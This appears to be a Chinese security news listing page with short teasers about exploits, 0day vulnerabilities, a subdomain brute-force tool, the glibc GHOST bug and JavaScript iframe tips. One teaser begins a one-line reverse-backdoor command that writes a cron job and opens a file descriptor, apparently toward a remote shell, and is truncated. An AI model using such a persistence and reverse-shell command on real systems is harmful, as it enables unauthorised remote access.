XDA上面放出了索尼手机的root提权工具而360的安全研究员retme也随即放出了一份利用这两个漏洞的提权代码 地址是:https://github.com/retme7/CVE-201...
移动安全
移动安全
漏洞分享
Adobe修复Flash Player两个0day漏洞
Adobe已修复两个在Adobe Flash里面的0day漏洞。修复第一个0day漏洞上周,公司宣布对Flash Player中的一个重要漏洞提供紧急更新。然而,这并非安全研究员Kafeine所报告的...
网络安全
万豪酒店Web服务漏洞泄露客户预订及支付信息
最近万豪酒店因拦截酒店会议中心的客户WiFi通讯而频见报端。作为万豪酒店的一名顾客,我想知道他们是怎么“拦截”访问我在他们系统中的敏感信息的。由于web服务的安全性常被忽略,从他们的万豪国际安卓app...
网络安全
Flash爆出高危0day漏洞,影响绝大多数windows版本
目前作者只给出了简单的描述,具体的技术细节我们会继续跟进。法国的安全研究者Kafeine发现在最新的Angler EK(一个挂马工具包)中集成了三个flash的漏洞用于挂马,其中两个是已经修复的漏洞,...
神兵利刃
子域名爆破工具——SubBrute
SubBrute的设计初衷是为了创造一个最快、最精确的子域名枚举工具。SubBrute的神奇之处在于,他用了开放的DNS解析器作为一种代理来规避DNS线速。(https://www.us-cert.g...
漏洞分享
Linux Glibc幽灵漏洞允许黑客远程获取系统权限
幽灵漏洞是Linux glibc库上出现的一个严重的安全问题,他可以让攻击者在不了解系统的任何情况下远程获取操作系统的控制权限。目前他的CVE编号为CVE-2015-0235。什么是glibcglib...
JS实现刷新iframe的方法
<iframe src="1.htm"name="ifrmname" id="ifrmid"></iframe>方案...
js实现关闭子页面父页面同时刷新
做项目的时候,需要实现这样一个功能:弹出一个窗口,对该窗口进行操作,操作结束后关闭该窗口,对父窗口进行刷新操作;纠结了小一会儿呢.查了一下资料,然后自己实践一下,成功了,下面将我查到的资料分享一下吧;...
一条命令实现无文件兼容性强的反弹后门
最好用一个不常见的用户执行,任务写入/var/spool/cron/$username (crontab -l;echo '*/60 * * * * exec 9<> /...
漏洞分享
CVE-2015-0393:Oracle发布严重安全漏洞预警
疑似后门:漏洞CVE-2015-0393江湖人称“Oracle漏洞猎手”的David Litchfield在去年6月11日发现过Oracle一个疑似后门的严重漏洞CVE-2015-0393。日前Lit...
